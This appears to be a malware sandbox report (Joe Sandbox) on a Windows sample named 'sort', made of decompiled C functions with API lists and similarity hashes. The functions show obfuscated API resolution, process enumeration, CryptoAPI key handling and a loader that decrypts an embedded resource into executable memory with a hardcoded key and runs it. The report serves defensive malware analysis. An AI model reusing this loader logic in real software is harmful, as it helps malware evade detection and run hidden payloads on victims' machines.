                                            				void* _t47;
                                            
                                            				_t44 = _v560;
                                            				_t27 = __ecx;
                                            				_t43 = __edx;
                                            				_t5 = 0x166df8ad;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t47 = _t5 - 0x31709247;
                                            						if(_t47 > 0) {
                                            							break;
                                            						}
                                            						if(_t47 == 0) {
                                            							_t17 =  *_t27( &_v556, _t43);
                                            							asm("sbb eax, eax");
                                            							_t5 = ( ~_t17 & 0xfe0bf6b3) + 0x395ce26e;
                                            							continue;
                                            						} else {
                                            							if(_t5 == 0x1c199) {
                                            								_v556 = 0x22c;
                                            								if( *0x227deb4 == 0) {
                                            									 *0x227deb4 = E02273E80(_t27, E02273F20(0xbb398380), 0x6e59538e, _t45);
                                            								}
                                            								L13:
                                            								_t7 = Process32NextW(_t44,  &_v556); // executed
                                            								asm("sbb eax, eax");
                                            								_t5 = ( ~_t7 & 0xf813afd9) + 0x395ce26e;
                                            								continue;
                                            							} else {
                                            								if(_t5 == 0x71faaa2) {
                                            									if( *0x227dbd8 == 0) {
                                            										 *0x227dbd8 = E02273E80(_t27, E02273F20(0xbb398380), 0xc9ddf643, _t45);
                                            									}
                                            									_t24 = CreateToolhelp32Snapshot(2, 0); // executed
                                            									_t44 = _t24;
                                            									if(_t44 == 0xffffffff) {
                                            										return _t24;
                                            									} else {
                                            										_t5 = 0x1c199;
                                            										continue;
                                            									}
                                            								} else {
                                            									if(_t5 != 0x166df8ad) {
                                            										goto L17;
                                            									} else {
                                            										_t5 = 0x71faaa2;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L25:
                                            					}
                                            					if(_t5 == 0x3768d921) {
                                            						if( *0x227decc == 0) {
                                            							 *0x227decc = E02273E80(_t27, E02273F20(0xbb398380), 0xc021696d, _t45);
                                            						}
                                            						goto L13;
                                            					} else {
                                            						if(_t5 == 0x395ce26e) {
                                            							if( *0x227dc70 == 0) {
                                            								 *0x227dc70 = E02273E80(_t27, E02273F20(0xbb398380), 0x560d239b, _t45);
                                            							}
                                            							_t13 = FindCloseChangeNotification(_t44); // executed
                                            							return _t13;
                                            						}
                                            						goto L17;
                                            					}
                                            					goto L25;
                                            					L17:
                                            				} while (_t5 != 0x3925027b);
                                            				return _t5;
                                            				goto L25;
                                            			}

















                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02274D29
                                            • Process32NextW.KERNEL32(00000000,?,?,00000000,?), ref: 02274D6F
                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 02274E0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ChangeCloseCreateFindNextNotificationProcess32SnapshotToolhelp32
                                            • String ID: n\9
                                            • API String ID: 1306606082-3894687320
                                            • Opcode ID: 700e7657183f4b543fc826e4625b6bb02e1117b32992846c2cde27693a6cac42
                                            • Instruction ID: d64089e06e1161012324ad33e3f0acd67fd75fab90143870abedfdad1167cbeb
                                            • Opcode Fuzzy Hash: 700e7657183f4b543fc826e4625b6bb02e1117b32992846c2cde27693a6cac42
                                            • Instruction Fuzzy Hash: 2931097177C20297D714BAF9B45566E21FA9F80258F04096AF451C724CEB78CC59CBD3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 57%
                                            			E02272650(intOrPtr* __ecx) {
                                            				char _v4;
                                            				char _v8;
                                            				intOrPtr _v32;
                                            				intOrPtr _t16;
                                            				intOrPtr* _t17;
                                            				intOrPtr* _t21;
                                            				intOrPtr _t26;
                                            				signed int _t27;
                                            				intOrPtr* _t30;
                                            				intOrPtr* _t31;
                                            				signed int _t32;
                                            				intOrPtr* _t33;
                                            				intOrPtr* _t35;
                                            				signed int _t36;
                                            				intOrPtr* _t37;
                                            				intOrPtr _t39;
                                            				intOrPtr* _t42;
                                            				void* _t52;
                                            				intOrPtr _t57;
                                            				intOrPtr _t60;
                                            				intOrPtr _t65;
                                            				intOrPtr _t69;
                                            				intOrPtr _t76;
                                            				intOrPtr* _t84;
                                            				intOrPtr* _t85;
                                            				intOrPtr* _t91;
                                            				intOrPtr* _t96;
                                            				signed int _t97;
                                            				void* _t108;
                                            				void* _t110;
                                            				void* _t111;
                                            
                                            				_t96 = __ecx;
                                            				_t97 = 0x50194b2;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t110 = _t97 - 0x1e656080;
                                            						if(_t110 > 0) {
                                            							break;
                                            						}
                                            						if(_t110 == 0) {
                                            							_t84 =  *0x227dddc;
                                            							__eflags = _t84;
                                            							if(_t84 == 0) {
                                            								_t84 = E02273E80(_t52, E02273F20(0x667fdee), 0x41956823, _t108);
                                            								 *0x227dddc = _t84;
                                            							}
                                            							_t16 =  *0x227e2e4; // 0x4d8ea8
                                            							_t4 = _t16 + 0x18; // 0x4d8ec0
                                            							_t17 =  *_t84( *((intOrPtr*)(_t16 + 8)), 0x8004, 0, 0, _t4); // executed
                                            							__eflags = _t17;
                                            							if(_t17 != 0) {
                                            								return 1;
                                            							} else {
                                            								_t97 = 0x264cda0c;
                                            								continue;
                                            							}
                                            						} else {
                                            							_t111 = _t97 - 0xf71ec4a;
                                            							if(_t111 > 0) {
                                            								__eflags = _t97 - 0x1032ae84;
                                            								if(_t97 == 0x1032ae84) {
                                            									_t21 =  *0x227dccc; // 0x0
                                            									__eflags = _t21;
                                            									if(_t21 == 0) {
                                            										_t21 = E02273E80(_t52, E02273F20(0x667fdee), 0x60964008, _t108);
                                            										 *0x227dccc = _t21;
                                            									}
                                            									_t57 =  *0x227e2e4; // 0x4d8ea8
                                            									 *_t21( *((intOrPtr*)(_t57 + 0x1c)));
                                            									_t97 = 0x20769828;
                                            									continue;
                                            								} else {
                                            									__eflags = _t97 - 0x17703602;
                                            									if(_t97 == 0x17703602) {
                                            										_t60 =  *0x227e2e4; // 0x4d8ea8
                                            										E02274250(_t52, _t60);
                                            										__eflags = 0;
                                            										return 0;
                                            									} else {
                                            										goto L17;
                                            									}
                                            								}
                                            							} else {
                                            								if(_t111 == 0) {
                                            									_t85 =  *0x227e13c;
                                            									__eflags = _t85;
                                            									if(_t85 == 0) {
                                            										_t85 = E02273E80(_t52, E02273F20(0x667fdee), 0x5f84d0c6, _t108);
                                            										 *0x227e13c = _t85;
                                            									}
                                            									_t26 =  *0x227e2e4; // 0x4d8ea8
                                            									_t1 = _t26 + 0x20; // 0x4d8ec8
                                            									_t27 =  *_t85( *((intOrPtr*)(_t26 + 8)), 0x660e, 1, _t1); // executed
                                            									asm("sbb esi, esi");
                                            									_t97 = ( ~_t27 & 0x0e32b1fc) + 0x1032ae84;
                                            									continue;
                                            								} else {
                                            									if(_t97 == 0x50194b2) {
                                            										_t30 = E022742F0(_t52, 0x24);
                                            										 *0x227e2e4 = _t30;
                                            										__eflags = _t30;
                                            										if(_t30 == 0) {
                                            											goto L18;
                                            										} else {
                                            											_t97 = 0x85ecca9;
                                            											continue;
                                            										}
                                            									} else {
                                            										if(_t97 != 0x85ecca9) {
                                            											goto L17;
                                            										} else {
                                            											_t31 =  *0x227dee8;
                                            											if(_t31 == 0) {
                                            												_t31 = E02273E80(_t52, E02273F20(0x667fdee), 0x249f770b, _t108);
                                            												 *0x227dee8 = _t31;
                                            											}
                                            											_t65 =  *0x227e2e4; // 0x4d8ea8
                                            											_t32 =  *_t31(_t65 + 8, 0, 0, 0x18, 0xf0000040); // executed
                                            											asm("sbb esi, esi");
                                            											_t97 = ( ~_t32 & 0x0cc3aa0b) + 0x17703602;
                                            											continue;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L47:
                                            					}
                                            					__eflags = _t97 - 0x2433e00d;
                                            					if(__eflags > 0) {
                                            						__eflags = _t97 - 0x264cda0c;
                                            						if(_t97 != 0x264cda0c) {
                                            							goto L17;
                                            						} else {
                                            							_t33 =  *0x227dccc; // 0x0
                                            							__eflags = _t33;
                                            							if(_t33 == 0) {
                                            								_t33 = E02273E80(_t52, E02273F20(0x667fdee), 0x60964008, _t108);
                                            								 *0x227dccc = _t33;
                                            							}
                                            							_t69 =  *0x227e2e4; // 0x4d8ea8
                                            							 *_t33( *((intOrPtr*)(_t69 + 0x20)));
                                            							_t97 = 0x1032ae84;
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(__eflags == 0) {
                                            							_t35 =  *0x227e04c;
                                            							__eflags = _t35;
                                            							if(_t35 == 0) {
                                            								_t35 = E02273E80(_t52, E02273F20(0x38bb5311), 0xa8366e55, _t108);
                                            								 *0x227e04c = _t35;
                                            							}
                                            							_t36 =  *_t35(0x10001, 0x13,  *_t96,  *((intOrPtr*)(_t96 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
                                            							asm("sbb esi, esi");
                                            							_t97 = ( ~_t36 & 0x029e39b6) + 0x20769828;
                                            							goto L1;
                                            						} else {
                                            							__eflags = _t97 - 0x20769828;
                                            							if(_t97 == 0x20769828) {
                                            								_t37 =  *0x227e084; // 0x0
                                            								__eflags = _t37;
                                            								if(_t37 == 0) {
                                            									_t37 = E02273E80(_t52, E02273F20(0x667fdee), 0x476fbf6d, _t108);
                                            									 *0x227e084 = _t37;
                                            								}
                                            								_t76 =  *0x227e2e4; // 0x4d8ea8
                                            								 *_t37( *((intOrPtr*)(_t76 + 8)), 0);
                                            								_t97 = 0x17703602;
                                            								goto L1;
                                            							} else {
                                            								__eflags = _t97 - 0x2314d1de;
                                            								if(_t97 == 0x2314d1de) {
                                            									_t91 =  *0x227ddfc;
                                            									__eflags = _t91;
                                            									if(_t91 == 0) {
                                            										_t91 = E02273E80(_t52, E02273F20(0x667fdee), 0xaba13237, _t108);
                                            										 *0x227ddfc = _t91;
                                            									}
                                            									_t39 =  *0x227e2e4; // 0x4d8ea8
                                            									_t6 = _t39 + 0x1c; // 0x4d8ec4
                                            									 *_t91( *((intOrPtr*)(_t39 + 8)), _v8, _v4, 0, 0, _t6); // executed
                                            									asm("sbb esi, esi");
                                            									_t42 =  *0x227dd40;
                                            									_t97 = (_t97 & 0xeefb5422) + 0x20769828;
                                            									__eflags = _t42;
                                            									if(_t42 == 0) {
                                            										_t42 = E02273E80(_t52, E02273F20(0xbb398380), 0x7f92dfac, _t108);
                                            										 *0x227dd40 = _t42;
                                            									}
                                            									 *_t42(_v32);
                                            								}
                                            								goto L17;
                                            							}
                                            						}
                                            					}
                                            					goto L47;
                                            					L17:
                                            					__eflags = _t97 - 0x16a1826b;
                                            				} while (_t97 != 0x16a1826b);
                                            				L18:
                                            				__eflags = 0;
                                            				return 0;
                                            				goto L47;
                                            			}


































                                            0x0227282b
                                            0x02272831
                                            0x02272837
                                            0x0227283d
                                            0x0227283f
                                            0x02272857
                                            0x02272859
                                            0x02272859
                                            0x0227285f
                                            0x02272864
                                            0x02272877
                                            0x0227287b
                                            0x0227287d
                                            0x02272888
                                            0x0227288e
                                            0x02272890
                                            0x022728a3
                                            0x022728a8
                                            0x022728a8
                                            0x022728b1
                                            0x022728b1
                                            0x00000000
                                            0x02272831
                                            0x02272825
                                            0x02272819
                                            0x00000000
                                            0x0227276f
                                            0x0227276f
                                            0x0227276f
                                            0x0227277c
                                            0x0227277c
                                            0x02272782
                                            0x00000000

                                            APIs
                                            • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 02272934
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CryptDecodeObject
                                            • String ID: 3$
                                            • API String ID: 1207547050-3878113309
                                            • Opcode ID: fa8f45e971401e1020f7ca33c19f386941e99e399c66aaf1e538ba41540471ac
                                            • Instruction ID: 12826e05d7e38f037adbc14c6de1c31cd1f60fa36e9f79327aab1ae7629a35d3
                                            • Opcode Fuzzy Hash: fa8f45e971401e1020f7ca33c19f386941e99e399c66aaf1e538ba41540471ac
                                            • Instruction Fuzzy Hash: 20712F32F6C212DBCB14FAF5EC54B9A32A3AF84704F054569ED069B25CEB709C158BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E02278240(void* __ebx, void* __ebp) {
                                            				short _v524;
                                            				char _v564;
                                            				char _v572;
                                            				struct _SECURITY_ATTRIBUTES* _v576;
                                            				signed int _v580;
                                            				signed int _v584;
                                            				signed int _v588;
                                            				signed int _v592;
                                            				intOrPtr _v596;
                                            				intOrPtr* _t86;
                                            				intOrPtr* _t88;
                                            				void* _t100;
                                            				void* _t101;
                                            				intOrPtr* _t103;
                                            				intOrPtr* _t106;
                                            				void* _t108;
                                            				void* _t109;
                                            				void* _t110;
                                            				void* _t111;
                                            				void* _t112;
                                            				unsigned int _t138;
                                            				void* _t140;
                                            				void* _t141;
                                            				signed int _t142;
                                            				intOrPtr _t144;
                                            				void* _t145;
                                            				void* _t148;
                                            
                                            				_t145 = __ebp;
                                            				_t112 = __ebx;
                                            				_v592 = 0xe2e3;
                                            				_v592 = _v592 ^ 0xd0dd7a16;
                                            				_t142 = 0x20540118;
                                            				_v592 = _v592 * 0x3d;
                                            				_v592 = _v592 | 0xc45f2d48;
                                            				_v592 = _v592 + 0xffffa838;
                                            				_v592 = _v592 + 0xde6b;
                                            				_v592 = _v592 ^ 0xf67dff2c;
                                            				_v592 = _v592 + _v592 * 4 << 2;
                                            				_v592 = _v592 ^ 0xf4577600;
                                            				_v584 = 0xc2f;
                                            				_v584 = _v584 << 0xb;
                                            				_v584 = _v584 * 0x17;
                                            				_v584 = _v584 >> 8;
                                            				_v584 = _v584 ^ 0x0008c1c9;
                                            				_v580 = 0xfdf2;
                                            				_v580 = _v580 << 7;
                                            				_v580 = _v580 ^ 0x007ef903;
                                            				_v588 = 0xe94a;
                                            				_v588 = _v588 ^ 0xa24bbed7;
                                            				_v588 = _v588 | 0x3a5f93cf;
                                            				_t113 = _v588;
                                            				_t141 = _v580;
                                            				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
                                            				_v588 = _v588 | 0xa489ddc5;
                                            				_v588 = _v588 + 0xf775;
                                            				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
                                            				_v588 = _t138;
                                            				_v588 = _v588 ^ 0x0235bf01;
                                            				while(1) {
                                            					L1:
                                            					_t148 = _t142 - 0x17c5ef14;
                                            					if(_t148 > 0) {
                                            						break;
                                            					}
                                            					if(_t148 == 0) {
                                            						_t86 =  *0x227dfec;
                                            						__eflags = _t86;
                                            						if(_t86 == 0) {
                                            							_t111 = E02273F20(0xbb398380);
                                            							_t138 = 0xd4fa8936;
                                            							_t86 = E02273E80(_t112, _t111, 0xd4fa8936, _t145);
                                            							 *0x227dfec = _t86;
                                            						}
                                            						 *_t86( &_v572);
                                            						_t142 = 0x2295af4;
                                            						continue;
                                            					} else {
                                            						if(_t142 == 0xa7036f) {
                                            							_t88 =  *0x227de58;
                                            							__eflags = _t88;
                                            							if(_t88 == 0) {
                                            								_t110 = E02273F20(0xbb398380);
                                            								_t138 = 0xb1aefb5;
                                            								_t88 = E02273E80(_t112, _t110, 0xb1aefb5, _t145);
                                            								 *0x227de58 = _t88;
                                            							}
                                            							 *_t88(0,  &_v524, 0x104);
                                            							_t142 = 0xfef53a6;
                                            							continue;
                                            						} else {
                                            							if(_t142 == 0x2295af4) {
                                            								_v580 = 0xa8c00;
                                            								_v576 = 0;
                                            								_v596 = E0227B590(_v580, _v576, 0x989680, 0);
                                            								_v592 = _t138;
                                            								_t140 = _v588 - _v564;
                                            								_t144 = _v596;
                                            								asm("sbb ecx, [esp+0x3c]");
                                            								__eflags = _v584 - _v592;
                                            								if(__eflags < 0) {
                                            									goto L24;
                                            								} else {
                                            									if(__eflags > 0) {
                                            										L29:
                                            										return 1;
                                            									} else {
                                            										__eflags = _t140 - _t144;
                                            										if(_t140 < _t144) {
                                            											goto L24;
                                            										} else {
                                            											goto L29;
                                            										}
                                            									}
                                            								}
                                            							} else {
                                            								if(_t142 != 0xfef53a6) {
                                            									L23:
                                            									__eflags = _t142 - 0x2ffd856e;
                                            									if(_t142 != 0x2ffd856e) {
                                            										continue;
                                            									} else {
                                            										goto L24;
                                            									}
                                            								} else {
                                            									if( *0x227dfbc == 0) {
                                            										_t101 = E02273F20(0xbb398380);
                                            										_t138 = 0xc0be2284;
                                            										 *0x227dfbc = E02273E80(_t112, _t101, 0xc0be2284, _t145);
                                            									}
                                            									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
                                            									_t141 = _t100;
                                            									if(_t141 == 0xffffffff) {
                                            										L24:
                                            										__eflags = 0;
                                            										return 0;
                                            									} else {
                                            										_t142 = 0x28eddbc7;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					L30:
                                            				}
                                            				__eflags = _t142 - 0x20540118;
                                            				if(_t142 == 0x20540118) {
                                            					_t142 = 0xa7036f;
                                            					goto L1;
                                            				} else {
                                            					__eflags = _t142 - 0x28eddbc7;
                                            					if(_t142 == 0x28eddbc7) {
                                            						_t103 =  *0x227e1e4;
                                            						__eflags = _t103;
                                            						if(_t103 == 0) {
                                            							_t109 = E02273F20(0xbb398380);
                                            							_t138 = 0xfddf2477;
                                            							_t103 = E02273E80(_t112, _t109, 0xfddf2477, _t145);
                                            							 *0x227e1e4 = _t103;
                                            						}
                                            						 *_t103(_t141, 0,  &_v564, 0x28);
                                            						asm("sbb esi, esi");
                                            						_t106 =  *0x227dc70;
                                            						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
                                            						__eflags = _t106;
                                            						if(_t106 == 0) {
                                            							_t108 = E02273F20(0xbb398380);
                                            							_t138 = 0x560d239b;
                                            							_t106 = E02273E80(_t112, _t108, 0x560d239b, _t145);
                                            							 *0x227dc70 = _t106;
                                            						}
                                            						 *_t106(_t141);
                                            					}
                                            					goto L23;
                                            				}
                                            				goto L30;
                                            			}

                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022783A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: J
                                            • API String ID: 823142352-2715717022
                                            • Opcode ID: f7f15390d42a92ce2a08f5a4511da3396046340a2f7d1cbf71d851ffdfa91369
                                            • Instruction ID: e9861f9c6d83ccf762c2dfcf4b5addbb64fc85e89a8e0fb9e56b44e68806398a
                                            • Opcode Fuzzy Hash: f7f15390d42a92ce2a08f5a4511da3396046340a2f7d1cbf71d851ffdfa91369
                                            • Instruction Fuzzy Hash: 4061CF32A193019BC718DFA8D899A2FB7E1BBC4754F00492DF4959B288D7B4C9098F93
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00409C36() {
                                            				_Unknown_base(*)()* _t1;
                                            
                                            				_t1 = SetUnhandledExceptionFilter(E00409BF0); // executed
                                            				 *0x439edc = _t1;
                                            				return _t1;
                                            			}

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00009BF0), ref: 00409C3B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
                                            • Instruction ID: b3cfb7864018c3ddb187660085869e9baaa6efe3d8831d09aec10079f1b62131
                                            • Opcode Fuzzy Hash: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
                                            • Instruction Fuzzy Hash: BCA022B02003808FCB20AF20BC3A0203B30F2003A23000032E000802F2EBF02880EF0C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 88%
                                            			E004013A4(intOrPtr __ecx) {
                                            				void* _v8;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				char _v36;
                                            				char _v40;
                                            				intOrPtr _v44;
                                            				CHAR* _v52;
                                            				intOrPtr _v64;
                                            				char _v68;
                                            				void* _v72;
                                            				char _v88;
                                            				intOrPtr _v128;
                                            				char _v144;
                                            				intOrPtr _v148;
                                            				intOrPtr _v152;
                                            				void* _v156;
                                            				long _v160;
                                            				char _v176;
                                            				void* _v180;
                                            				intOrPtr _v184;
                                            				char _v200;
                                            				char _v216;
                                            				intOrPtr _v228;
                                            				char _v232;
                                            				intOrPtr _v236;
                                            				intOrPtr _v240;
                                            				intOrPtr _v244;
                                            				intOrPtr _v248;
                                            				char _v252;
                                            				void* _v256;
                                            				struct HINSTANCE__* _v260;
                                            				char _v264;
                                            				char _v268;
                                            				char _v272;
                                            				char _v288;
                                            				char _v292;
                                            				char _v296;
                                            				char _v300;
                                            				char _v316;
                                            				void* _v320;
                                            				intOrPtr _v448;
                                            				intOrPtr _v452;
                                            				intOrPtr _v456;
                                            				intOrPtr _v460;
                                            				intOrPtr _v464;
                                            				intOrPtr _v468;
                                            				intOrPtr _v472;
                                            				void* _t188;
                                            				void* _t189;
                                            				intOrPtr _t244;
                                            
                                            				_push(0xffffffff);
                                            				_push(E00429B1F);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t244;
                                            				_v448 = __ecx;
                                            				_v256 = 0;
                                            				_v256 = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateDirectoryA");
                                            				if(CreateDirectoryA("C:\\Windows\\Microsoft.NET", 0) == 0) {
                                            					_v152 = 0x1e55;
                                            					_v240 = 0x1155;
                                            					_v44 = 0x409;
                                            					_v72 = 0;
                                            					_v160 = 0;
                                            					_v252 = 0xa;
                                            					_v248 = _v152;
                                            					_v244 = _v44;
                                            					_v260 = 0;
                                            					_v176 = _v264;
                                            					E00401AE0( &_v176, 0);
                                            					E00401B90( &_v176, "LdrFin", E00405A40("LdrFin"));
                                            					_v8 = 0;
                                            					_v216 = _v268;
                                            					E00401AE0( &_v216, 0);
                                            					E00401B90( &_v216, "dReso", E00405A40("dReso"));
                                            					_v8 = 1;
                                            					_v36 = _v272;
                                            					E00401AE0( &_v36, 0);
                                            					E00401B90( &_v36, "urce_U", E00405A40("urce_U"));
                                            					_v8 = 2;
                                            					_v452 = E00402030( &_v288,  &_v176,  &_v216);
                                            					_v456 = _v452;
                                            					_v8 = 3;
                                            					E00402030( &_v232, _v456,  &_v36);
                                            					_v8 = 5;
                                            					E00401AE0( &_v288, 1);
                                            					_v200 = _v292;
                                            					E00401AE0( &_v200, 0);
                                            					E00401B90( &_v200, "Ldr", E00405A40("Ldr"));
                                            					_v8 = 6;
                                            					_v144 = _v296;
                                            					E00401AE0( &_v144, 0);
                                            					E00401B90( &_v144, "Acces", E00405A40("Acces"));
                                            					_v8 = 7;
                                            					_v88 = _v300;
                                            					E00401AE0( &_v88, 0);
                                            					E00401B90( &_v88, "sResource", E00405A40("sResource"));
                                            					_v8 = 8;
                                            					_v460 = E00402030( &_v316,  &_v200,  &_v144);
                                            					_v464 = _v460;
                                            					_v8 = 9;
                                            					E00402030( &_v68, _v464,  &_v88);
                                            					_v8 = 0xb;
                                            					E00401AE0( &_v316, 1);
                                            					_v52 = "ntdll.dll";
                                            					if(_v228 != 0) {
                                            						_v468 = _v228;
                                            					} else {
                                            						_v468 = 0x42b704;
                                            					}
                                            					_v184 = _v468;
                                            					if(_v64 != 0) {
                                            						_v472 = _v64;
                                            					} else {
                                            						_v472 = 0x42b704;
                                            					}
                                            					_v128 = _v472;
                                            					_v260 = LoadLibraryA(_v52);
                                            					 *0x437cbc = GetProcAddress(_v260, "LdrFindResource_U");
                                            					 *0x437cb4 = GetProcAddress(_v260, "LdrAccessResource");
                                            					_v236 =  *0x437cbc(0x400000,  &_v252, 3,  &_v40);
                                            					if(_v236 >= 0) {
                                            						_v236 =  *0x437cb4(0x400000, _v40,  &_v72,  &_v160);
                                            					}
                                            					_v180 = 0;
                                            					if(CreateDirectoryA("C:\\ProgramData\\", 0) == 0) {
                                            						_t189 = VirtualAlloc(0, _v160, 0x1000, 0x40); // executed
                                            						_v180 = _t189;
                                            					}
                                            					E00405700(_v180, _v72, _v160);
                                            					E0040107E("@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@", 0x2f,  &_v20);
                                            					E00401163(_v180, _v160,  &_v20);
                                            					_v156 = _v180;
                                            					_v148 = _v156();
                                            					_v320 = 0;
                                            					_v8 = 8;
                                            					E00401AE0( &_v68, 1);
                                            					_v8 = 7;
                                            					E00401AE0( &_v88, 1);
                                            					_v8 = 6;
                                            					E00401AE0( &_v144, 1);
                                            					_v8 = 5;
                                            					E00401AE0( &_v200, 1);
                                            					_v8 = 2;
                                            					E00401AE0( &_v232, 1);
                                            					_v8 = 1;
                                            					E00401AE0( &_v36, 1);
                                            					_v8 = 0;
                                            					E00401AE0( &_v216, 1);
                                            					_v8 = 0xffffffff;
                                            					E00401AE0( &_v176, 1);
                                            					_t188 = _v320;
                                            				} else {
                                            					_t188 = 0;
                                            				}
                                            				 *[fs:0x0] = _v16;
                                            				return _t188;
                                            			}

                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 004013DC
                                            • GetProcAddress.KERNEL32(00000000), ref: 004013E3
                                            • CreateDirectoryA.KERNELBASE(C:\Windows\Microsoft.NET,00000000), ref: 004013F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AddressCreateDirectoryLibraryLoadProc
                                            • String ID: @P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@$Acces$C:\ProgramData\$C:\Windows\Microsoft.NET$CreateDirectoryA$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$dReso$kernel32.dll$sResource$urce_U
                                            • API String ID: 3952968459-2121162702
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042592B() {
                                            				void* __ecx;
                                            				void* __ebp;
                                            				struct _CRITICAL_SECTION* _t36;
                                            				void* _t37;
                                            				struct _CRITICAL_SECTION* _t42;
                                            				signed char* _t58;
                                            				void* _t61;
                                            				void* _t63;
                                            				void* _t65;
                                            				signed int _t70;
                                            				void* _t71;
                                            				intOrPtr _t72;
                                            				signed int _t73;
                                            				void* _t74;
                                            
                                            				_t71 = _t65;
                                            				_t1 = _t71 + 0x1c; // 0x4399c8
                                            				_t36 = _t1;
                                            				 *(_t74 + 0x14) = _t36;
                                            				EnterCriticalSection(_t36);
                                            				_t3 = _t71 + 4; // 0x20
                                            				_t72 =  *_t3;
                                            				_t4 = _t71 + 8; // 0x4
                                            				_t70 =  *_t4;
                                            				if(_t70 >= _t72) {
                                            					L2:
                                            					_t70 = 1;
                                            					if(_t72 <= _t70) {
                                            						L7:
                                            						_t13 = _t71 + 0x10; // 0x4c0158
                                            						_t37 =  *_t13;
                                            						_t73 = _t72 + 0x20;
                                            						if(_t37 != 0) {
                                            							_t61 = GlobalHandle(_t37);
                                            							GlobalUnlock(_t61);
